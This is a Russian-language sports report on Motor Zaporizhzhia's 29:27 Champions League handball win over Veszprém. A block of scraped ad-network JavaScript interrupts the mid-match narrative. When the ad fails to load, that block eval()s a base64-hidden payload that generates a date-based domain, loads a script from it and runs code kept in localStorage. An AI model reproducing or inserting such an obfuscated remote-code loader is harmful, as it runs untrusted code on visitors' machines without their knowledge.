Дома и стены помогают: в Запорожье «МОТОР» сенсационно побеждает грозный «Веспрем» (ФОТО, ВИДЕО)

В нынешнем розыгрыше Лиги чемпионов ЕГФ «МОТОР» побеждает только на домашней арене ДС «Юность». В активе чемпионов Украины 3 из 4 побед в Запорожье.

В 7-ом туре Лиги чемпионов в Запорожье пожаловал самый титулованный и самый знаменитый гандбольный клуб Венгрии — «Веспрем», четырехкратный финалист Лиги чемпионов. За всю историю соревнований клубы играли друг с другом восемь раз, и только однажды «Мотор» набрал очки в групповом этапе ЛЧ 2013/14.

«МОТОР» — «Веспрем»: в этом сезоне Лиги чемпионов запорожцы набирают очки только дома

Несмотря на строгие карантинные ограничения, во Дворце спорта «Юность» собралось более тысячи любителей гандбола, стоимость билетов на матч составляла от 60 до 200 гривен.

С первых минут матча «соколы» захватили инициативу. На второй минуте поединка счет забитым мячам открыл белорусский легионер «МОТОРа» Вячеслав Бохан, а вскоре запорожцы усилиями Луки Себетича и Захара Денисова увеличили результат до 3:0.

Гинтарас Савукинас и Айденас Малашинскас

В очередной раз демонстрировал класс в рамке ворот Геннадий Комок — после двух нереализованных семиметровых, венгры смогли забросить первый мяч лишь к девятой минуте встречи. На экваторе первого тайма «Веспрем» вплотную приблизился к запорожцам, установи паритет 6:6, и то, ненадолго. Воспользовавшись двумя двухминутными удалениями у гостей, чемпионы Украины увеличили отрыв до комфортных +4, 10:6.

Вратарь «Веспрема» Родриго Кораллес

На гол Козакевича в конце поединка ответил олимпийский чемпион Токио-2020 француз Кентин Маэ, установив окончательный результат первого тайма 14:12 в пользу хозяев.

Артем Козакевич

После перерыва запорожцы продолжили наращивать свое преимущество, да так, что ушедший на замену вратарь «Веспрема» испанец Родриго Корралес в сердцах ударил ногой стул, после которого тот покинул пределы технической зоны.

Лишь единожды за второй тайм «Веспрему» удалось подкрасться к «соколам» на расстояние одного мяча, 21:20. На что «МОТОР» мгновенно отреагировал четырьмя безответными голами в ворота Владимира Чупары. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Отдельного внимания заслуживает комбинация Малашинскас-Козакевич-Пуховский, завершившаяся голом СуперБори, ставшим для него единственным в матче.

Посмотреть эту публикацию в Instagram

Публикация от EHF Champions League (@ehfcl)

Немного растеряв голевое преимущество, запорожцы сумели довести матч до победы, ни разу не позволив сопернику выйти вперед хотя бы на один мяч. Как итог, заслуженная победа 29:27 и продолжение борьбы за место в заветной «шестерке» команд, которые по итогам группового турнира продолжат борьбу в раунде плей-офф.

Захар Денисов

По итогам матча лучшими снайперами в составе «МОТОРа» стали Захар Денисов и Дмитрий Горига — 6 голов, на счету лучшего бомбардира «Веспрема» Кентина Маэ также 6 мячей.

Следующий матч «МОТОР» проведет на выезде с «Веспремом» 25 ноября в 19:45.